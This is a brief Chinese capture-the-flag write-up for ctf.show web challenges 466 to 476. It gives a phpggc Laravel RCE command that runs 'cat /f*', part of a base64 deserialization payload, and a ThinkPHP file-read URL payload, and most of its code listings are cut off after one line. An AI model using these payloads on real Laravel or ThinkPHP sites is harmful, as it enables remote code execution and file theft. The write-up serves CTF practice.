web466
Laravel5.4版本,查看网上找到poc:
1 | <?php |
使用方法:/admin/序列化串base64
cat /flag得到flag
web467
Laravel5.5版本
用网上链条:
1 | <?php |
web468
Laravel5.5版本
使用工具phpggc,poc:./phpggc Laravel/RCE3 system "cat /f* >1.txt"|base64
得到exp:
1 | Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIA |
Web469-472
均可以用phpggc速通,写个py脚本遍历rce payload:
1 | import os |
web473
使用工具一把梭
payload:
1 | https://6a7b4eda-5fa4-48c5-9991-7dfe90e70c8c.challenge.ctf.show?s=index/\think\Lang/load&file=/flag |
web474-476
Thinkphp框架判断:访问http://xxx:8080/router.php
,Thinkphp里面必定含有这个php文件。再次访问http://xxx:8080/?s=a
poc网址:https://blog.csdn.net/qq_67473072/article/details/131696323
推荐一把梭解决